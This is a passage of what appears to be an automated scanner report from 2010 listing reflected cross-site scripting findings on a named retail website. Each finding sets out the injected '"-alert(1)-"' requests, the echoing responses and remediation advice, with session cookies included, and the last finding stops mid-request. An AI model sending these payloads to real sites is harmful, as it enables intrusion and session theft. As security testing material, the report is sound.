HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:10:40 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=eofi4cehnhrq7cjhic94pg8n24; expires=Tue, 09-Nov-2010 17:10:40 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29375

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/men/blank-canvas-stussy2afe3"-alert(1)-"17e2dabd41a/");
//]]>
...[SNIP]...

1.93. http://www.fredperry.com/limited-edition/men/blank-canvas-stussy/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/blank-canvas-stussy/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e98e0"-alert(1)-"c82982309e0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/men/blank-canvas-stussy/?e98e0"-alert(1)-"c82982309e0=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:09:12 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=8uq4t9tp6ek6qei8dt0k6npeg0; expires=Tue, 09-Nov-2010 17:09:12 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 32692

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Stussy
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/men/blank-canvas-stussy/?e98e0"-alert(1)-"c82982309e0=1");
//]]>
...[SNIP]...

1.94. http://www.fredperry.com/limited-edition/men/british-collectables/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/british-collectables/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 47139"-alert(1)-"b6d2d00f18f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition47139"-alert(1)-"b6d2d00f18f/men/british-collectables/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:14:09 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=sfu3s4rje88g7t3ohsukesr565; expires=Tue, 09-Nov-2010 17:14:09 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29376

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition47139"-alert(1)-"b6d2d00f18f/men/british-collectables/");
//]]>
...[SNIP]...

1.95. http://www.fredperry.com/limited-edition/men/british-collectables/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/british-collectables/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ee4ce"-alert(1)-"3a91705cda8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/menee4ce"-alert(1)-"3a91705cda8/british-collectables/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:14:29 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=ols796ihtsstq0v73n79ngdik2; expires=Tue, 09-Nov-2010 17:14:30 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29376

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/menee4ce"-alert(1)-"3a91705cda8/british-collectables/");
//]]>
...[SNIP]...

1.96. http://www.fredperry.com/limited-edition/men/british-collectables/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/british-collectables/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7d891"-alert(1)-"954da85411 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/men/british-collectables7d891"-alert(1)-"954da85411/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:15:04 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=b1epgpls29dt2opr8uvoi9n5r4; expires=Tue, 09-Nov-2010 17:15:04 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29375

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/men/british-collectables7d891"-alert(1)-"954da85411/");
//]]>
...[SNIP]...

1.97. http://www.fredperry.com/limited-edition/men/british-collectables/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/british-collectables/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3a4d7"-alert(1)-"2d4c44a3758 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/men/british-collectables/?3a4d7"-alert(1)-"2d4c44a3758=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:12:28 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=ubuiuuhet0dis73pjekk81b9h3; expires=Tue, 09-Nov-2010 17:12:28 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 46052

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> British
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/men/british-collectables/?3a4d7"-alert(1)-"2d4c44a3758=1");
//]]>
...[SNIP]...

1.98. http://www.fredperry.com/limited-edition/men/collaboration-raf-simons-centenary-outfit/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/collaboration-raf-simons-centenary-outfit/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7fe56"-alert(1)-"1a825ea7b3d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition7fe56"-alert(1)-"1a825ea7b3d/men/collaboration-raf-simons-centenary-outfit/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:12:49 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=i9k9giecjcr5q6n0askfpvs5f4; expires=Tue, 09-Nov-2010 17:12:49 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29397

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition7fe56"-alert(1)-"1a825ea7b3d/men/collaboration-raf-simons-centenary-outfit/");
//]]>
...[SNIP]...

1.99. http://www.fredperry.com/limited-edition/men/collaboration-raf-simons-centenary-outfit/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/collaboration-raf-simons-centenary-outfit/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aa46c"-alert(1)-"fd5429705a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/menaa46c"-alert(1)-"fd5429705a/collaboration-raf-simons-centenary-outfit/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:13:14 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=eiabdltr7afs24cjo1kl3f3fl4; expires=Tue, 09-Nov-2010 17:13:14 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29396

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/menaa46c"-alert(1)-"fd5429705a/collaboration-raf-simons-centenary-outfit/");
//]]>
...[SNIP]...

1.100. http://www.fredperry.com/limited-edition/men/collaboration-raf-simons-centenary-outfit/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/collaboration-raf-simons-centenary-outfit/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f2872"-alert(1)-"429b7d0d03a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/men/collaboration-raf-simons-centenary-outfitf2872"-alert(1)-"429b7d0d03a/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:13:41 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=m9t2nujfnbq882ma058gmk5hq3; expires=Tue, 09-Nov-2010 17:13:42 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29397

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/men/collaboration-raf-simons-centenary-outfitf2872"-alert(1)-"429b7d0d03a/");
//]]>
...[SNIP]...

1.101. http://www.fredperry.com/limited-edition/men/collaboration-raf-simons-centenary-outfit/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/collaboration-raf-simons-centenary-outfit/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 911a8"-alert(1)-"6872c7ca1c6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/men/collaboration-raf-simons-centenary-outfit/?911a8"-alert(1)-"6872c7ca1c6=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:12:10 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=tq0lkqj1ku5kt3qfsve5dv2lu0; expires=Tue, 09-Nov-2010 17:12:10 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29400

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/men/collaboration-raf-simons-centenary-outfit/?911a8"-alert(1)-"6872c7ca1c6=1");
//]]>
...[SNIP]...

1.102. http://www.fredperry.com/limited-edition/men/collaboration-raf-simons/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/collaboration-raf-simons/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 27e13"-alert(1)-"1e1df12ea80 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition27e13"-alert(1)-"1e1df12ea80/men/collaboration-raf-simons/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:08:15 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=4hofbk9rao1b3tbe0ko177upb5; expires=Tue, 09-Nov-2010 17:08:15 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29380

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition27e13"-alert(1)-"1e1df12ea80/men/collaboration-raf-simons/");
//]]>
...[SNIP]...

1.103. http://www.fredperry.com/limited-edition/men/collaboration-raf-simons/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/collaboration-raf-simons/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 29976"-alert(1)-"56522880a08 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/men29976"-alert(1)-"56522880a08/collaboration-raf-simons/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:08:35 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=h3d2v4e6cnf09ine2ihuj62p74; expires=Tue, 09-Nov-2010 17:08:35 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29380

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/men29976"-alert(1)-"56522880a08/collaboration-raf-simons/");
//]]>
...[SNIP]...

1.104. http://www.fredperry.com/limited-edition/men/collaboration-raf-simons/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/collaboration-raf-simons/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c8f7b"-alert(1)-"9130791ac77 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/men/collaboration-raf-simonsc8f7b"-alert(1)-"9130791ac77/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:09:03 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=f4lees3sdljodl2notjhfc64m1; expires=Tue, 09-Nov-2010 17:09:03 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29380

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/men/collaboration-raf-simonsc8f7b"-alert(1)-"9130791ac77/");
//]]>
...[SNIP]...

1.105. http://www.fredperry.com/limited-edition/men/collaboration-raf-simons/ [SID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/collaboration-raf-simons/

Issue detail

The value of the SID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b6089"-alert(1)-"78f69521811 was submitted in the SID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/men/collaboration-raf-simons/?SID=2hPWQxiLpIPJPjREOVJiLvolj/gt24Tjf99vflOKNYQ=b6089"-alert(1)-"78f69521811 HTTP/1.1
Host: www.fredperry.com
Proxy-Connection: keep-alive
Referer: http://fredperry.com/home/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
